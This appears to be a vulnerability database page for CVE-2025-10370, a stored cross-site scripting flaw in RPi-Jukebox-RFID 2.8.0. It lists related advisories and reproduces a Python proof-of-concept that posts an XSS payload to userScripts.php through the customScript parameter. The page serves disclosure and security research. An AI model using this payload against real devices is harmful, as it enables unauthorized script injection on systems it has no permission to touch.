Lucene search
K

📄 RPi-Jukebox-RFID 2.8.0 Cross Site Scripting

🗓️ 05 Feb 2026 00:00:00Reported by Beatriz Fresno NaumovaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 141 Views

Stored XSS in RPi-Jukebox-RFID 2.8.0 via userScripts.php through the customScript parameter (CVE-2025-10370).

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-10370
13 Sep 202519:46
circl
CNNVD
RPi-Jukebox-RFID 代码注入漏洞
13 Sep 202500:00
cnnvd
CVE
CVE-2025-10370
13 Sep 202517:02
cve
Cvelist
CVE-2025-10370 MiczFlor RPi-Jukebox-RFID userScripts.php cross site scripting
13 Sep 202517:02
cvelist
Exploit DB
RPi-Jukebox-RFID 2.8.0 - Stored Cross-Site Scripting (XSS)
2 Feb 202600:00
exploitdb
EUVD
EUVD-2025-29096
3 Oct 202520:07
euvd
NVD
CVE-2025-10370
13 Sep 202517:15
nvd
OSV
CVE-2025-10370 MiczFlor RPi-Jukebox-RFID userScripts.php cross site scripting
13 Sep 202517:02
osv
Positive Technologies
PT-2025-37389
13 Sep 202500:00
ptsecurity
RedhatCVE
CVE-2025-10370
15 Sep 202518:07
redhatcve
Rows per page
# Exploit Title: RPi-Jukebox-RFID 2.8.0 - Stored XSS (CVE-2025-10370)
    # Date: 2025-09-25
    # Exploit Author: Beatriz Fresno Naumova
    # Vendor Homepage: https://github.com/MiczFlor/RPi-Jukebox-RFID
    # Software Link: https://github.com/MiczFlor/RPi-Jukebox-RFID/releases/tag/v2.8.0
    # Version: 2.8.0
    # Tested on: Raspberry Pi OS with RPi-Jukebox-RFID v2.8.0
    # CVE: CVE-2025-10370
    #
    # Description:
    # This PoC demonstrates a Cross-Site Scripting (XSS) vulnerability in the userScripts.php page.
    # The vulnerable parameter "customScript" does not sanitize input correctly, allowing injection
    # of arbitrary JavaScript payloads.
    
    import requests
    
    # Change this to the actual IP or hostname of the target device
    TARGET = "http://YOUR-TARGET-IP/phoniebox/htdocs/userScripts.php"
    
    # The XSS payload
    PAYLOAD = '"><img src=x onerror=alert("XSS - CVE-2025-10370")>'
    
    # HTTP headers
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": TARGET,
    }
    
    # POST data with the malicious payload
    data = {
        "customScript": PAYLOAD
    }
    
    def send_exploit():
        print(f"[+] Sending XSS payload to {TARGET}")
        try:
            r = requests.post(TARGET, headers=headers, data=data, timeout=5)
            print(f"[+] Payload sent. Status code: {r.status_code}")
            print("[*] If the target is vulnerable, the payload will execute when the page is rendered.")
        except Exception as e:
            print(f"[-] Exploit failed: {e}")
    
    if __name__ == "__main__":
        send_exploit()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Feb 2026 00:00Current
4.6Medium risk
Vulners AI Score4.6
CVSS 3.13.5 - 5.4
CVSS 24
CVSS 45.1
CVSS 33.5
EPSS0.00631
SSVC
141